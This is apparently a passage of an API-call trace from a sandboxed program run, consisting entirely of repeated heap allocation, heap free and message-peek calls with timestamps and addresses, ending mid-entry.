[0257.538] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda6d8 [0257.538] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda6a8 | out: hHeap=0xbc0000) returned 1 [0257.538] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b28 | out: hHeap=0xbc0000) returned 1 [0257.538] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda6f0 | out: hHeap=0xbc0000) returned 1 [0257.538] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.538] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b28 [0257.538] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe2a8 [0257.538] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda6f0 [0257.538] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b18 [0257.538] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b48 [0257.538] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x1) returned 0xc01b38 [0257.538] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b18 | out: hHeap=0xbc0000) returned 1 [0257.538] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda6a8 [0257.538] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b18 [0257.538] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b18 | out: hHeap=0xbc0000) returned 1 [0257.538] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b38 | out: hHeap=0xbc0000) returned 1 [0257.538] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b48 | out: hHeap=0xbc0000) returned 1 [0257.538] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda6f0 | out: hHeap=0xbc0000) returned 1 [0257.538] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda6a8 | out: hHeap=0xbc0000) returned 1 [0257.538] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbfe2a8 | out: hHeap=0xbc0000) returned 1 [0257.538] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b28 | out: hHeap=0xbc0000) returned 1 [0257.538] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b88 | out: hHeap=0xbc0000) returned 1 [0257.538] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc018c8 | out: hHeap=0xbc0000) returned 1 [0257.538] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.538] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.538] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc018c8 [0257.538] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe2a8 [0257.538] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda6a8 [0257.538] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b88 [0257.538] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b88 | out: hHeap=0xbc0000) returned 1 [0257.539] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda6f0 [0257.539] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b88 [0257.539] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b88 | out: hHeap=0xbc0000) returned 1 [0257.539] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda6a8 | out: hHeap=0xbc0000) returned 1 [0257.539] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda6f0 | out: hHeap=0xbc0000) returned 1 [0257.539] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbfe2a8 | out: hHeap=0xbc0000) returned 1 [0257.539] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc018c8 | out: hHeap=0xbc0000) returned 1 [0257.539] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda6f0 [0257.539] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda6a8 [0257.539] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xc018c8 [0257.539] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda6a8 | out: hHeap=0xbc0000) returned 1 [0257.539] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc018c8 | out: hHeap=0xbc0000) returned 1 [0257.539] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda6f0 | out: hHeap=0xbc0000) returned 1 [0257.539] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.539] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc018c8 [0257.539] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe2a8 [0257.539] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda6f0 [0257.539] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b88 [0257.539] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b88 | out: hHeap=0xbc0000) returned 1 [0257.539] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda6a8 [0257.539] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b88 [0257.539] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b88 | out: hHeap=0xbc0000) returned 1 [0257.539] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda6f0 | out: hHeap=0xbc0000) returned 1 [0257.539] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda6a8 | out: hHeap=0xbc0000) returned 1 [0257.539] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbfe2a8 | out: hHeap=0xbc0000) returned 1 [0257.539] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc018c8 | out: hHeap=0xbc0000) returned 1 [0257.539] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.539] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.539] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc018c8 [0257.539] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe2a8 [0257.539] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda6a8 [0257.539] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b88 [0257.539] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b88 | out: hHeap=0xbc0000) returned 1 [0257.540] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda6f0 [0257.540] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b88 [0257.540] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b88 | out: hHeap=0xbc0000) returned 1 [0257.540] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda6a8 | out: hHeap=0xbc0000) returned 1 [0257.540] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda6f0 | out: hHeap=0xbc0000) returned 1 [0257.540] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbfe2a8 | out: hHeap=0xbc0000) returned 1 [0257.540] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc018c8 | out: hHeap=0xbc0000) returned 1 [0257.540] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda6f0 [0257.540] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda6a8 [0257.540] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xc018c8 [0257.540] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda6a8 | out: hHeap=0xbc0000) returned 1 [0257.540] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc018c8 | out: hHeap=0xbc0000) returned 1 [0257.540] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda6f0 | out: hHeap=0xbc0000) returned 1 [0257.540] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.540] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc018c8 [0257.540] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe2a8 [0257.540] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda6f0 [0257.540] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b88 [0257.540] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b88 | out: hHeap=0xbc0000) returned 1 [0257.540] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda6a8 [0257.540] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b88 [0257.540] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b88 | out: hHeap=0xbc0000) returned 1 [0257.540] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda6f0 | out: hHeap=0xbc0000) returned 1 [0257.540] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda6a8 | out: hHeap=0xbc0000) returned 1 [0257.540] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbfe2a8 | out: hHeap=0xbc0000) returned 1 [0257.540] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc018c8 | out: hHeap=0xbc0000) returned 1 [0257.540] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.540] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.540] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc018c8 [0257.540] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe2a8 [0257.540] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda6a8 [0257.540] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b88 [0257.541] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b88 | out: hHeap=0xbc0000) returned 1 [0257.541] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda6f0 [0257.541] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b88 [0257.541] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b88 | out: hHeap=0xbc0000) returned 1 [0257.541] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda6a8 | out: hHeap=0xbc0000) returned 1 [0257.541] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda6f0 | out: hHeap=0xbc0000) returned 1 [0257.541] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbfe2a8 | out: hHeap=0xbc0000) returned 1 [0257.541] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc018c8 | out: hHeap=0xbc0000) returned 1 [0257.541] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda6f0 [0257.541] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda6a8 [0257.541] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xc018c8 [0257.541] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda6a8 | out: hHeap=0xbc0000) returned 1 [0257.541] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc018c8 | out: hHeap=0xbc0000) returned 1 [0257.541] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda6f0 | out: hHeap=0xbc0000) returned 1 [0257.541] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.541] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc018c8 [0257.541] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe2a8 [0257.541] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda6f0 [0257.541] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b88 [0257.541] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b88 | out: hHeap=0xbc0000) returned 1 [0257.541] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda6a8 [0257.541] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b88 [0257.541] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b88 | out: hHeap=0xbc0000) returned 1 [0257.541] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda6f0 | out: hHeap=0xbc0000) returned 1 [0257.541] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda6a8 | out: hHeap=0xbc0000) returned 1 [0257.541] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbfe2a8 | out: hHeap=0xbc0000) returned 1 [0257.541] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc018c8 | out: hHeap=0xbc0000) returned 1 [0257.541] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.541] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.541] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc018c8 [0257.541] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe2a8 [0257.542] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda6a8 [0257.542] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b88 [0257.542] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b88 | out: hHeap=0xbc0000) returned 1 [0257.542] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda6f0 [0257.542] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b88 [0257.542] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b88 | out: hHeap=0xbc0000) returned 1 [0257.542] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda6a8 | out: hHeap=0xbc0000) returned 1 [0257.542] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda6f0 | out: hHeap=0xbc0000) returned 1 [0257.542] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbfe2a8 | out: hHeap=0xbc0000) returned 1 [0257.542] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc018c8 | out: hHeap=0xbc0000) returned 1 [0257.542] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda6f0 [0257.542] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda6a8 [0257.542] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xc018c8 [0257.542] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda6a8 | out: hHeap=0xbc0000) returned 1 [0257.542] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc018c8 | out: hHeap=0xbc0000) returned 1 [0257.542] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda6f0 | out: hHeap=0xbc0000) returned 1 [0257.542] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.542] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc018c8 [0257.542] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe2a8 [0257.542] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda6f0 [0257.542] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b88 [0257.542] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b88 | out: hHeap=0xbc0000) returned 1 [0257.542] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda6a8 [0257.542] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b88 [0257.542] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b88 | out: hHeap=0xbc0000) returned 1 [0257.542] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda6f0 | out: hHeap=0xbc0000) returned 1 [0257.542] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda6a8 | out: hHeap=0xbc0000) returned 1 [0257.542] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbfe2a8 | out: hHeap=0xbc0000) returned 1 [0257.542] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc018c8 | out: hHeap=0xbc0000) returned 1 [0257.542] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.542] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.542] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc018c8 [0257.543] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe2a8 [0257.543] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda6a8 [0257.543] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b88 [0257.543] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b88 | out: hHeap=0xbc0000) returned 1 [0257.543] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda6f0 [0257.543] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b88 [0257.543] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b88 | out: hHeap=0xbc0000) returned 1 [0257.543] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda6a8 | out: hHeap=0xbc0000) returned 1 [0257.543] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda6f0 | out: hHeap=0xbc0000) returned 1 [0257.543] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbfe2a8 | out: hHeap=0xbc0000) returned 1 [0257.543] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc018c8 | out: hHeap=0xbc0000) returned 1 [0257.543] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda6f0 [0257.543] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda6a8 [0257.543] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xc018c8 [0257.543] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda6a8 | out: hHeap=0xbc0000) returned 1 [0257.543] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc018c8 | out: hHeap=0xbc0000) returned 1 [0257.543] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda6f0 | out: hHeap=0xbc0000) returned 1 [0257.543] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.543] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc018c8 [0257.543] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe2a8 [0257.543] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda6f0 [0257.543] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b88 [0257.543] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b88 | out: hHeap=0xbc0000) returned 1 [0257.543] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda6a8 [0257.543] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b88 [0257.543] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b88 | out: hHeap=0xbc0000) returned 1 [0257.543] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda6f0 | out: hHeap=0xbc0000) returned 1 [0257.543] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda6a8 | out: hHeap=0xbc0000) returned 1 [0257.543] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbfe2a8 | out: hHeap=0xbc0000) returned 1 [0257.543] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc018c8 | out: hHeap=0xbc0000) returned 1 [0257.543] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.543] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.544] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc018c8 [0257.544] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe2a8 [0257.544] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda6a8 [0257.544] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b88 [0257.544] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b88 | out: hHeap=0xbc0000) returned 1 [0257.544] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda6f0 [0257.544] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b88 [0257.544] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b88 | out: hHeap=0xbc0000) returned 1 [0257.544] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda6a8 | out: hHeap=0xbc0000) returned 1 [0257.544] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda6f0 | out: hHeap=0xbc0000) returned 1 [0257.544] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbfe2a8 | out: hHeap=0xbc0000) returned 1 [0257.544] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc018c8 | out: hHeap=0xbc0000) returned 1 [0257.544] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda6f0 [0257.544] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda6a8 [0257.544] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xc018c8 [0257.544] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda6a8 | out: hHeap=0xbc0000) returned 1 [0257.544] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc018c8 | out: hHeap=0xbc0000) returned 1 [0257.544] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda6f0 | out: hHeap=0xbc0000) returned 1 [0257.544] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.544] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc018c8 [0257.544] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe2a8 [0257.544] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda6f0 [0257.544] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b88 [0257.545] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b88 | out: hHeap=0xbc0000) returned 1 [0257.545] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda6a8 [0257.545] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b88 [0257.545] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b88 | out: hHeap=0xbc0000) returned 1 [0257.545] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda6f0 | out: hHeap=0xbc0000) returned 1 [0257.545] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda6a8 | out: hHeap=0xbc0000) returned 1 [0257.545] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbfe2a8 | out: hHeap=0xbc0000) returned 1 [0257.545] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc018c8 | out: hHeap=0xbc0000) returned 1 [0257.545] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.545] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.545] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc018c8 [0257.545] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe2a8 [0257.545] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda6a8 [0257.545] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b88 [0257.545] HeapFree (in: hHeap=0xbc0000, 